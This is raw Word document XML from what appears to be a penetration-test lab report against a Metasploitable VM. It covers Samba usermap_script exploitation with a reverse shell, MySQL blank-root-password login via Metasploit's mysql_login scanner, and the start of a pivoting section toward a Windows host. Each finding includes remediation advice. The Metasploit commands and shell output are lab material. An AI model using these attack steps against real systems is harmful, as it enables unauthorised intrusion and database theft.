        <w:ind w:firstLine="1" w:left="653" w:right="6544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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>exploit(usermap_script)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exploit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Started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reverse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TCP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handler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on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192.168.50.2:4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1301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Command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shell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opened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(192.168.50.2:4444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-&gt;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192.168.50.3:60993)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whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9169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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>root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hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8369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metasploitable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uname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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-a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Linux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metasploitable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2.6.24-16-server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#1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SMP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Ubuntu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8.04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i686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GNU/Linux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90" coordorigin="1080,10712" coordsize="9373,10" o:spt="12" path="m1080,10716l10453,10716">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 890" type="Shape 890" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3888" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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36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18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19" w:name="19"/>
    <w:bookmarkEnd w:id="19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078,1080" coordsize="14,7452" o:spt="12" path="m1085,1080l1085,8532">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 59" type="Shape 59" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:374.58pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3818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095,1078" coordsize="10050,14" o:spt="12" path="m1095,1085l11145,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 60" type="Shape 60" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3820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1143,1080" coordsize="14,7452" o:spt="12" path="m11150,1080l11150,8532">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 61" type="Shape 61" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:374.58pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657490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352.00pt;z-index:3870;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_HP8C" o:title="Image141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0,1095" coordsize="10065,7437" o:spt="12" path="m1090,1095l11155,1095l11155,8532l1090,8532">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:373.86pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#F0FAFF" stroked="f">
            <v:fill type="solid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" coordorigin="1095,8530" coordsize="10050,14" o:spt="12" path="m1095,8537l11145,8537">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 62" type="Shape 62" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3828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376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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="107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6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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact: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Immediate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shell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without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any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authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="58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full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system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compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fix: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Upgrade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Samba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3.0.25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later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(vulnerability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patched).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Use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latest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stable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release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Harden: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Restrict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SMB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ports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(139/445)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via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firewall.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Disable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SMB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if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file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sharing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not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required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="33" w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="1205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111"/>
          <w:noProof/>
        </w:rPr>
        <w:t>• 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21"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Network: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Use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VPN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legitimate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SMB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access.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Segment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file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servers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from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external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networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="48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7"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="268" w:after="0" w:line="268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7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4.6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Port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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="76"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>MySQL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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(No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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Root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Password)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32" coordorigin="1052,11907" coordsize="10141,10" o:spt="12" path="m1052,11912l11193,11912">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 432" type="Shape 432" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3832" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="364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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:jc w:val="left"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblInd w:type="dxa" w:w="358"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="E63946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002"/>
        <w:gridCol w:w="3683"/>
        <w:gridCol w:w="3678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="612" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="E63946"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="E63946" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2002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34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FFFFFF"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-17"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3683" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="107" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="156"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:spacing w:val="5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CVSS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5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Score: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4A5568"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="12" w:line="210" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="155" w:right="1059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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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13"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-4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-1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CWE-521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—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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Weak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1B3A5C"/>
                <w:spacing w:val="1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="41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3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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="91" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="728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MySQL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5.0.51a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is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configured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account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having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no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password,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remote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login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is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permitted.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attacker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can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connect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directly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from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machine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gain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full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administrative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database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access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without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any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="9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credential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="323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19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14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323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20" w:name="20"/>
    <w:bookmarkEnd w:id="20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43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7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Discovery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Metasploit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" coordorigin="1095,1877" coordsize="9363,4840" o:spt="12" path="m1095,1877l10458,1877l10458,6717l1095,6717">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 80" type="Shape 80" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:244.00pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:-251657496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84" coordorigin="1080,1877" coordsize="29,4840" o:spt="12" path="m1095,1877l1095,6717">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 384" type="Shape 384" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:244.00pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3838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85" coordorigin="1080,1868" coordsize="9373,10" o:spt="12" path="m1080,1872l10453,1872">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 385" type="Shape 385" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3839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86" coordorigin="10453,1868" coordsize="10,4850" o:spt="12" path="m10458,1868l10458,6717">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 386" type="Shape 386" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:244.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3842" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7346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Confirm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MySQL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service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5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nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="871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-sV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-p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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3306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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4955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3306/tcp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mysql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MySQL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5.0.51a-3ubuntu5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6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Credential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scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9280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2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use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5979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auxiliary/scanner/mysql/mysql_login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3" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8599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RHOSTS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192.168.50.3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8028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USERNAME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root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7231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BLANK_PASSWORDS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true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run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[+]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192.168.50.3:3306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-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Login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Successful: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root:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="192" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="3165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(blank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password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confirmed)</w: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87" coordorigin="1080,6717" coordsize="9373,10" o:spt="12" path="m1080,6722l10453,6722">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 387" type="Shape 387" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3846" filled="f" stroked="t" strokeweight="0.48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5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5"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="325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5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5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Exploitation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63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Direct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Database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Access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21" coordorigin="1095,8138" coordsize="9363,4624" o:spt="12" path="m1095,8138l10458,8138l10458,12762l1095,12762">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 421" type="Shape 421" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:233.19pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:-251657462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26" coordorigin="1080,8138" coordsize="29,4624" o:spt="12" path="m1095,8138l1095,12762">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 826" type="Shape 826" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:233.19pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3871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27" coordorigin="1080,8129" coordsize="9373,10" o:spt="12" path="m1080,8134l10453,8134">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 827" type="Shape 827" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3872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28" coordorigin="10453,8129" coordsize="10,4633" o:spt="12" path="m10458,8129l10458,12762">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 828" type="Shape 828" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:233.67pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3875" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5067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Connect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directly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as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root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with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no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password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6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mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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3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-h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192.168.50.3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-u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root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--skip-ssl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1641"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="#D4D4D4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Welcome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2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the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MariaDB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monitor.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Server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version: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5.0.51a-3ubuntu5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(Ubuntu)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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>MySQL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[(none)]&gt;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3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show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databases;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="217" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7456"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="#D4D4D4"/>
          <w:spacing w:val="8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+--------------------+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Database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13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+--------------------+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information_schema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dvwa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59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metasploit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91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mysql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48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owasp10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25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tikiwiki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3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+--------------------+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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>MySQL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[(none)]&gt;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use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metasploit;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show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tables;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[Full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administrative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access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all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databases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confirmed]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29" coordorigin="1080,12762" coordsize="9373,10" o:spt="12" path="m1080,12767l10453,12767">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 829" type="Shape 829" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3879" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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85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20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21" w:name="21"/>
    <w:bookmarkEnd w:id="21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</w:p>
    <w:p>
      <w:pPr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-1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078,1080" coordsize="14,4946" o:spt="12" path="m1085,1080l1085,6026">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 59" type="Shape 59" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:249.28pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3818" filled="f" stroked="t" strokeweight="0.72pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
            <v:stroke dashstyle="short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095,1078" coordsize="10050,14" o:spt="12" path="m1095,1085l11145,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 60" type="Shape 60" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3820" filled="f" stroked="t" strokeweight="0.72pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
            <v:stroke dashstyle="dashDot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1143,1080" coordsize="14,4946" o:spt="12" path="m11150,1080l11150,6026">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 61" type="Shape 61" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:249.28pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657490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5.00pt;width:503.00pt;height:227.00pt;z-index:3832;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_qBAC" o:title="Image146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0,1095" coordsize="10065,4936" o:spt="12" path="m1090,1095l11155,1095l11155,6031l1090,6031">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:248.80pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#F0FAFF" stroked="f">
            <v:fill type="solid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" coordorigin="1095,6024" coordsize="10050,14" o:spt="12" path="m1095,6031l11145,6031">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 62" type="Shape 62" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:3pt;mso-position-vertical-relative:paragraph;z-index:3828" filled="f" stroked="t" strokeweight="0.72pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
            <v:stroke dashstyle="dashDot"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="27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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="221" w:after="0" w:line="221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2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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&amp;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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75" w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="1137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111"/>
          <w:noProof/>
        </w:rPr>
        <w:t>• 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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact: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Complete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database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compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="58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data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exfiltration,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modification,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deletion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possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="60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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fix: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Set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strong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password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immediately:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64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9"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Access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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Control: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Disable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remote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login.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Restrict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port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3306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trusted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IPs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only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via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firewall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64" w:after="0" w:line="229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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Principle: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Apply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least-privilege.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Application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accounts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should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only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access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their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own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database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64" w:after="0" w:line="226" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720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ab/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16"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Upgrade:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:b/>
          <w:bCs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Migrate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modern,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supported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MySQL/MariaDB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version.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08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21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22" w:name="22"/>
    <w:bookmarkEnd w:id="22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202" w:after="0" w:line="333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60"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5.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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Post-Exploitation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89"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Windows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3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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Payload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7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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&amp;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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Pivoting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1" coordorigin="1292,1450" coordsize="9901,19" o:spt="12" path="m1292,1460l11193,1460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 101" type="Shape 101" style="position:absolute;left:0;text-align:left;margin-left:63.58pt;width:497.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="341" w:after="0" w:line="25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9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5.1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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Pivoting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1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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Through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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Metasploitable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9"/>
          <w:noProof/>
        </w:rPr>
        <w:t>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5" coordorigin="1052,2045" coordsize="10141,10" o:spt="12" path="m1052,2050l11193,2050">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 135" type="Shape 135" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:29pt;mso-position-vertical-relative:paragraph;z-index:3817" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="600"/>
        <w:jc w:val="left"/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root-level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access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(the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bridge),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attacker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can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route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traffic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into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internal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vLAN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(10.10.10.0/24)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target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Windows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10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endpoint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10.10.10.4.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Metasploit's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routing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capabilities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allow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all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internal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traffic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flow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through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existing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Meterpreter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session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="600"/>
        <w:jc w:val="left"/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344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85"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="248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85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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1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59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Establish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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Meterpreter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Session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on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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Bridge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25" coordorigin="1095,3831" coordsize="9363,4629" o:spt="12" path="m1095,3831l10458,3831l10458,8460l1095,8460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 425" type="Shape 425" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:233.43pt;mso-position-horizontal-relative:page;margin-top:28pt;mso-position-vertical-relative:paragraph;z-index:-251657494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47" coordorigin="1080,3831" coordsize="29,4629" o:spt="12" path="m1095,3831l1095,8460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 747" type="Shape 747" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:233.43pt;mso-position-horizontal-relative:page;margin-top:28pt;mso-position-vertical-relative:paragraph;z-index:3839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48" coordorigin="1080,3822" coordsize="9373,10" o:spt="12" path="m1080,3827l10453,3827">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 748" type="Shape 748" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3840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49" coordorigin="10453,3822" coordsize="10,4638" o:spt="12" path="m10458,3822l10458,8460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
